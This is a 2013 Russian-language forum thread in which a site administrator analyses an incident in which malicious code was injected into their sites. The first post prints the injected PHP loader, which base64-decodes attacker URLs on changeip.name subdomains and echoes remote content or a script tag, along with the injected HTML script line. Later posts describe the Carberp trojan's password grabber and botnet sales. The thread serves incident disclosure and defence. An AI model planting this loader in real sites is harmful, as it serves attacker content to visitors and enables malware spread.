Вредоносный код на сайте, feelthesame.changeip.name |
Здравствуйте, гость ( Вход | Регистрация )
Вредоносный код на сайте, feelthesame.changeip.name |
5.2.2013, 20:22
Сообщение
#1
|
||
Администратор Группа: Главные администраторы Сообщений: 14349 Регистрация: 12.10.2007 Из: Twilight Zone Пользователь №: 1 |
В один прекрасный день, мы обнаружили на некоторых наших сайтах изменения, которые мы не вносили, а именно, в части скриптов index.php код:
Код <? function sql2_safe($in) { $rtn = base64_decode($in); return $rtn; } function collectnewss() { if (!isset($_COOKIE["iJijkdaMnerys"])) { $value = 'yadeor'; $ip = $_SERVER['REMOTE_ADDR']; $get = sql2_safe("aHR0cDovL2N0cmxzaS5jaGFuZ2VpcC5uYW1lOjg4OC9tb3ZlLnBocD9pcD0=").$ip; $content = @file_get_contents($get); @setcookie("iJijkdaMnerys", $value, time()+3600*24); if (!$content) echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48 L3NjcmlwdD4="); else echo $content; } } collectnewss (); ?> В части страниц index.html (.htm): Код <script src="http://feelthesame.changeip.name/rsize.js"></script> Проведенный анализ показал, что ПК одного из контент-менеджеров оказался зараженным вирусом, который проник на него через уязвимость в Java. В результате все сохраненные в FTP клиенте пароли к хостинговым площадкам были украдены. Затем злоумышленники запустили скрипт, который автоматически входил на все украденные ftp аккаунты, искал в них файлы index.php и index.html и внедрял туда свой код. В результате масса паролей оказались скомпроментированы, а значительное количество ресурсов заражено. Т.о. получилась ситуация аналогичная, описанной в статье Троянский вирус ворует пароли от FTP. В настоящий момент работа всех наших ресурсов восстановлена, в отношении скомпроментированных аккаунтов предприняты дополнительные меры безопасности. p.s. Урок, который можно извлечь из всего этого - "не храните все яйца в одной корзине", не оставляйте сохраненных паролей в браузерах или FTP клиенте, т.к. любой вредоносный код, так или иначе запустившийся на вашей системе без труда выкрадет их. Как показала практика - дело это поставлено у авторов вируса на поток, проверить автоматически все украденные пароли, внедрить вредоносный код и получить в итоге энное количество дополнительных зараженных сайтов - не миф, а реальность. В частности пострадал наш ресурс http://svadbaauto.ru/ и хотя ресурс уже полностью безопасен, в результатах поиска какое-то время он будет отображаться с предупреждением: p.p.s. Судя по различным форумам мы не первые, вот пример человека, столкнувшегося с 1 в 1 похожей проблемой. -------------------- |
|
|
||
5.2.2013, 22:00
Сообщение
#2
|
|
Администратор Группа: Главные администраторы Сообщений: 14349 Регистрация: 12.10.2007 Из: Twilight Zone Пользователь №: 1 |
Теперь по традиции, ссылки по теме:
Правда, уважаемый Дмитрий Андреев немного не прав, пароли у него "слила" не FileZilla, а вирус, который он успел подхватить, к слову, в нашем случае в качестве "пострадавшего" FTP-клинта был FAR FTP plugin. Т.е. вредонос знает уже как минимум два популярных FTP клиента, а также место и алгоритм по которому они хранят сохраненные пароли. В обоих случаях заражения, после того как злоумышленник (автор вируса) получал пароли на FTP происходило заражение index.php либо index.html сайтов находящихся на этих FTP. Отличительной чертой, явно указывающей на одинаковое происхождение вируса, был редирект / ссылка / внедренный iframe / скрипт обнаруженный на зараженных впоследствие сайтах, ссылающийся на URL в поддомене changeip.name ... в нашем случае это был feelthesame.changeip.name, в другом случае - kinoshkaxa.changeip.name ... -------------------- |
|
|
16.2.2013, 11:43
Сообщение
#3
|
|
Администратор Группа: Главные администраторы Сообщений: 14349 Регистрация: 12.10.2007 Из: Twilight Zone Пользователь №: 1 |
Собственно пойманная нами штука являлась одной из разновидностей трояна Carberp, вот небольшое описание. Там же есть ссылка на sendspace и полное описание в архиве с паролем, приведем здесь лишь некоторые цитаты из него, естественно, без указания контактов, чтобы нас не обвинили в пособничестве созданию и распространению вредоносного ПО. Даже минимальная комплектация, предлагаемая авторами данного трояна (или правильнее наверное будет сказать ботнета) впечатляет:
Что же касается поддерживаемого граббером ПО, т.е. список софта, откуда потенциально при заражении могут быть сворованы ваши пароли, он довольно внушителен: Список программ граббера
Плюс, в расширенной версии предлагается универсальный кейлоггер, сканер документов на заданные владельцем ботнета словосочетания и т.п. Авторы, как видно, работают с большим размахом и постоянно обновляют и совершенствуют свое ПО, еще бы, с расценками от 5000$ до 40000$ за ботнет под ключ, или от 2000$ до 10000$ ежемесячно - почему бы и не "работать". Заказчики подобного рода malware, на мой взгляд, всегда найдутся Написание компьютерных вирусов давно уже перестало быть прерогативой "энтузиастов-одиночек", работающих из интереса, теперь, как мы видим, процесс поставлен на "широкую ногу" и приносит вполне реальную коммерческую выгоду. Вопрос кто победит в этой "войне", AV-комании или вирусмейкеры, черное или белое, добро или зло ... мы оставим за нашим читателем. В качестве рекомендаций, как избежать заражения троянами, подобным Carberp, можем порекомендовать следующее:
-------------------- |
|
|
Текстовая версия | Сейчас: 24.12.2024, 4:18 | |